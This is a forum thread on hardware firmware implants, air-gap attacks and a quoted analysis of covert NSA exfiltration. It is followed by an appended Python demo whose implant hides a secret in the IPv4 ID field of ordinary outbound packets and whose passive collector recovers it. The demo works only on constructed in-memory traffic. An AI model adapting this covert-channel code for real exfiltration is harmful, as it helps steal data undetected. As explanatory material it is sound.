
Thread: Air Gap

  1. DJ Ms. White
    #1

    Air Gap

    Log In - The New York Times

    Eh, the URL didn't play nice. Anywho, the gist is that more details have been revealed on stuff like Stuxnet. Details include hard drives shipped to target countries having infected firmware.
    Last edited by DJ Ms. White; 02-16-15 at 07:54 PM.
    enf-Jesus its been like 12 minutes and you're already worried about stats?! :-P
    Bigdog-
    Sweet home Alabama you are an idiot.


  2. deputyfestus
    #3

    Re: Air Gap

    Could y'all pare this down to street level, something like "we're screwed; if you want to keep anything private, get two cans and a string manufactured before 1980".

  3. DJ Ms. White
    #4

    Re: Air Gap

    Firmware is something that helps control hardware and that an antivirus can't examine. If it's infected, things get rough.

    An air gap is where you have a computer or network of computers that are disconnected from the internet. It was thought to be a good defense mechanism.

    This method means that the hard drives shipped for government use to Iran, Russia, etc. from major HDD manufacturers had infected firmware. This allowed for the US (and possibly Israel since they helped with Stuxnet) to infect/control networks of computers thought to be beyond reach. Stuxnet was what damaged the Iranian nuclear program a few years back.

    TL;DR: You're probably safe as you aren't a government.
    Last edited by DJ Ms. White; 02-17-15 at 09:18 AM.

  4. Registered TeamPlayer
    #5

    Re: Air Gap

    Quote Originally Posted by deputyfestus:
    Could y'all pare this down to street level, something like "we're screwed; if you want to keep anything private, get two cans and a string manufactured before 1980".

    The variety of attacks and compromises available is astounding, and many of them exist at very low levels in the architecture.

    You should read the word "astounding" in a literal sense. The technical accomplishments amaze even people in the industry.

    I didn't read the Air-Gap piece that White (sort of) posted (friggin' NYTimes 'log-in'...), but it seems like the thrust is that spooks have been able to penetrate foreign networks that are not connected to the internet. These networks are "air gapped" - like setting up a LAN of machines with no WiFi in a house with no internet service. One way they do this is by compromising hardware components ahead of time, and arranging to have the hardware installed in the 'secure' network. Once your code is inside someone else's air-gapped network it can cause all sorts of trouble. It might even find a way to get information out over a side-channel.

    The Thinkst article is the one I find most revealing. It's not about air gaps, but is a decent metric for how completely fucked we all are. One point from there:

        Even if we were completely underprepared as defenders, one would think that those cases where implants were communicating back to the NSA would have been discovered (even if by accident) sooner or later. Once more, the documents reveal why this would not have resulted in the classic "smoking gun".

        A common IR process when an attack has been discovered is to determine where the exfiltrated data is going to. In the most simplistic case (or if big budget movies are involved) this simple step could allow an analyst to say:
        "The data from this compromised host is going to HOST_B in country_X. So country_X is the culprit."

        Of course, since even spirited teenagers have been making use of "jump hosts" since the 90's, a variation on this would be not just to base the attribution on the location of HOST_B, but to observe who then accesses HOST_B to "collect the loot". (It's the sort of time you really want to be the "global passive adversary".)

        Even this would have tipped the NSA's hand sooner or later, and what we see from the docs is a clever variation on the theme:

        We see the use of an entire new protocol, called FASHIONCLEFT, to effectively copy traffic off a network, attach metadata to it, then hide the packet within another packet allowed to exfil the targeted network.

        Tunnelling one type of traffic over another is not novel (although a 27 page interface control document for the protocol is cool) but this still leaves open the possibility that you would see victim_machine talking to HOST_X in Europe. This is where passive collection comes in...

        This is beautiful! So the data is munged into any packet that is likely to make it out of the network, and is then directed past a passive collector. This means that we can't rely on the host the data was sent to for attribution, and even if we did completely own the last hop, to see who shows up to grab the data, we would be watching in vain, because the deed was done when the packets traversed a network 3 hops ago.

        This really is an elegant solution and a beautiful sleight of hand. With the NSA controlling tens of thousands of passive hosts scattered around the Internet, good luck ever finding that smoking gun!

    That is... to get the data out they stuff it into other packets that are legitimately outbound from the network. Those packets, legitimately sent by someone in their office doing the things they should be doing, then traverse the internet on their way to their legitimate and expected destination. The hidden data is sucked out as it traverses the internet by one (of at least thousands) of the compromised nodes along the way.

    The Flash article is another example of how lame and exploitable Flash is - but that shouldn't be news to anyone here.

    The DefCon article says that the war has moved down a level. OS exploits are very last-century. You should be at least as worried about your hardware and the code running in it. The implication is that if you got (say) a new motherboard you should absolutely not trust it. If you de-soldered and removed all the components and then re-flashed their firmware with known-secure code, and then reassembled your motherboard - then you're still not completely safe.

    It's easy to see why all this inspires so much anger and paranoia.

    But it's also pretty amazing.


    Æ
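The "stuff it into legitimately outbound packets, pull it out at a transit hop" pattern described in the post above, as an added example that is not part of the thread and not the FASHIONCLEFT protocol (the thread gives no details of it, and none are reproduced here). The carrier used as a stand-in is the 16-bit IPv4 Identification field, a classic covert channel; the hosts, addresses and packets are constructed sample data, and `passive_collect` is handed the packet list directly where a real tap would be sniffing a link. The point it shows: the recovered secret is correct, while the only destinations the IR analyst sees are the legitimate ones.

```python
"""Toy model of in-transit passive exfil collection. All data is constructed."""
import ipaddress
import struct
import zlib

IMPLANTED_HOST = "192.0.2.10"                            # constructed (TEST-NET-1)
LEGIT_DESTINATIONS = ["198.51.100.25", "203.0.113.7"]    # constructed: mail relay, web server


def ipv4_checksum(header: bytes) -> int:
    """Ones'-complement checksum over the 20-byte header (checksum field zeroed)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_ipv4(src: str, dst: str, payload: bytes, ident: int, proto: int = 6) -> bytes:
    """Minimal IPv4 header (IHL=5, DF set, TTL 64) followed by the payload."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, 0x4000, 64, proto, 0,
                      ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)
    return hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:] + payload


def parse_ipv4(pkt: bytes) -> dict:
    f = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    return {"src": str(ipaddress.ip_address(f[8])), "dst": str(ipaddress.ip_address(f[9])),
            "ident": f[3], "payload": pkt[20:]}


def frame_secret(secret: bytes) -> bytes:
    """2-byte length + data + CRC32, so the collector knows when it has the whole thing."""
    if len(secret) > 250:
        raise ValueError("demo keeps the whole frame under 256 carrier packets")
    return struct.pack("!H", len(secret)) + secret + struct.pack("!I", zlib.crc32(secret))


def implant_stuff(secret: bytes, outbound: list) -> list:
    """Implant side. `outbound` is the host's own (dst, payload) traffic, in send order.
    The IP ID of the first len(frame) packets becomes (sequence << 8 | hidden byte);
    destinations and payloads are left exactly as the user sent them."""
    frame = frame_secret(secret)
    if len(frame) > len(outbound):
        raise ValueError("not enough legitimate traffic to carry the secret yet")
    pkts = []
    for seq, (dst, payload) in enumerate(outbound):
        if seq < len(frame):
            ident = (seq << 8) | frame[seq]
        else:
            ident = 0xFFFF - (seq & 0xFF)   # filler ID once the frame has gone out
        pkts.append(build_ipv4(IMPLANTED_HOST, dst, payload, ident))
    return pkts


def passive_collect(packets_on_the_wire: list, implanted_hosts: set) -> dict:
    """Transit-hop side: reassemble hidden frames from any packet whose *source* is an
    implanted host, whatever its destination. Assumes in-order delivery (demo only)."""
    chunks = {}       # host -> {seq: hidden byte}
    recovered = {}    # host -> secret, only once the CRC checks out
    for raw in packets_on_the_wire:
        p = parse_ipv4(raw)
        host = p["src"]
        if host not in implanted_hosts or host in recovered:
            continue
        seq, hidden = p["ident"] >> 8, p["ident"] & 0xFF
        got = chunks.setdefault(host, {})
        got[seq] = hidden
        if 0 in got and 1 in got:
            n = (got[0] << 8) | got[1]
            total = 2 + n + 4
            if all(i in got for i in range(total)):
                frame = bytes(got[i] for i in range(total))
                secret = frame[2:2 + n]
                (crc,) = struct.unpack("!I", frame[2 + n:total])
                if zlib.crc32(secret) == crc:
                    recovered[host] = secret
    return recovered


def destinations_seen_by_ir(packets: list, host: str) -> set:
    """The answer to 'where is the compromised host sending data?' That is all the
    destination-based attribution step in the quoted article has to work with."""
    return {parse_ipv4(p)["dst"] for p in packets if parse_ipv4(p)["src"] == host}


def demo():
    secret = b"sample secret document"   # constructed
    # 40 ordinary packets alternating between two legitimate destinations (constructed).
    outbound = [(LEGIT_DESTINATIONS[i % 2], b"GET /index.html" if i % 2 else b"MAIL FROM:<a@b>")
                for i in range(40)]
    wire = implant_stuff(secret, outbound)
    recovered = passive_collect(wire, {IMPLANTED_HOST})
    return recovered.get(IMPLANTED_HOST), destinations_seen_by_ir(wire, IMPLANTED_HOST)


if __name__ == "__main__":
    got, dests = demo()
    print("collector recovered:", got)
    print("IR analyst sees traffic only to:", sorted(dests))
```

The collector here is keyed on the source address of hosts it already knows it implanted, which is why the packets' destinations never matter to it; the analyst's function, by contrast, can only ever return the mail relay and the web server. In practice an IP ID channel like this one is weak cover (a high byte that counts up by one per packet stands out against a stack's normal ID behaviour), which is part of why the article makes a point of the bespoke encapsulation rather than the field used.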
